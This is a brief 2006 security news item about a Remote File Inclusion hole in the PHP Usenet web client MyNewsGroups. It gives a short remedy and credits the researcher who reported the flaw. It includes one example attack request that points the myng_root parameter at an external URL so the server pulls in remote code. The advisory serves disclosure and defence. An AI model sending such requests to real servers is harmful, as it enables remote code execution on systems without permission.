In association with heise online

01 August 2006, 13:23

Usenet application MyNewsGroups endangers server security

  • Twitter
  • Facebook
  • submit to slashdot
  • StumbleUpon
  • submit to reddit

Usenet clients that use a Web interface are practical and flexible. But servers that run on the MyNewsGroups Open Source client written in PHP may soon be receiving some unexpected company. Philipp Niedziela has discovered a hole that allows arbitrary scripts to be executed on servers via Remote File Inclusion. The problem is the result of a flaw in the filtering of the variable myng_root, which puts paths into scripts by means of

http://server/lib/tree/layersmenu.inc.php?myng_root=externe_url.

The flaw is in versions prior to, and including, 0.6b. Niedziela says that the problem is solved when the variable myng_root is permanently assigned a value. For further details, see his report.

Also see:

(ehe)

Print Version | Send by email | Permalink: http://h-online.com/-731302
 


  • July's Community Calendar





The H Open

The H Security

The H Developer

The H Internet Toolkit